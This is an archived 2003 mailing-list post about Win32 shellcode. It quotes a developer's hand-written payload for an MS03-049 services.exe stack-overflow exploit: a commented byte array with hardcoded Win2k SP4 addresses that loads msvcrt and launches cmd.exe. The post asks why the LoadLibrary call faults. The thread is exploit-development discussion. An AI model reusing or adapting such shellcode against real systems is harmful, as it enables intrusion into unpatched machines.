Vulnerability Development mailing list archives
Re: Win32 Shellcode question.
From: Tobias Klein <tobias.klein () ewetel de>
Date: Mon, 01 Dec 2003 09:07:12 +0100
http://www.newroot.de/projects/winsys.c greets newroot At 19:29 27.11.2003 -0800, Vinay A. Mahadik wrote:
I was writing an exploit for the MS03-049 services.exe stack overflow vuln (from scratch for my own academic interest). Here's my shellcode to simply launch a "cmd.exe" shell.#define LL 0x7C4F05CF #define SYS 0x78018EBF char payload[] = { 0x55, // push ebp 0x8B, 0xEC, // mov ebp,esp 0x33, 0xC0, // xor eax,eax 0x50, // push eax 0x50, // push eax 0xC7, 0x45, 0xF8, 0x6D, 0x73, 0x76, 0x63, // mov dword ptr [ebp-8],6376736Dh 0x66, 0xC7, 0x45, 0xFC, 0x72, 0x74, // mov word ptr [ebp-4],7472h 0x8D, 0x45, 0xF8, // lea eax,[ebp-8] 0x50, // push eax 0xB8, 0xCF, 0x05, 0x4F, 0x7C, // mov eax,LL 0xFF, 0xD0, // call eax <------------ Problem call 0x8B, 0xE5, // mov esp,ebp 0x33, 0xC0, // xor eax,eax 0x50, // push eax 0x50, // push eax 0xC7, 0x45, 0xF8, 0x63, 0x6D, 0x64, 0x2E, // mov dword ptr [ebp-8],2E646D63h 0x66, 0xC7, 0x45, 0xFC, 0x65, 0x78, // mov word ptr [ebp-4],7865h 0xC6, 0x45, 0xFE, 0x65, // mov byte ptr [ebp-2],65h 0x8D, 0x45, 0xF8, // lea eax,[ebp-8] 0x50, // push eax 0xB8, 0xBF, 0x8E, 0x01, 0x78, // mov eax,SYS 0xFF, 0xD0, // call eax ... };"After the overflow, I can step through the NOP sled, and reach the above payload - meaning I have control over the CPU's exec path, and can make it execute my payload. However, I keep getting an "Access Violation" writing location.. error inside the "call eax" that corresponds with LoadLibrary("msvcrt").I have confirmed the LL and SYS variables for the target (Win2k SP4). Plus, the payload works just fine when compiled and executed outside of services.exe . Is there something special about services.exe that prevents LoadLibraryA from executing normally or what did I do wrong? Can you spot anything I am overlooking? The same payload has worked on other stack-overflow exploits, and inside a simple main(){} loop.Thanks, Vinay.
Current thread:
- Re: Win32 Shellcode question. Tobias Klein (Dec 01)
- RE: [PenTest] Re: Win32 Shellcode question. Brett Moore (Dec 01)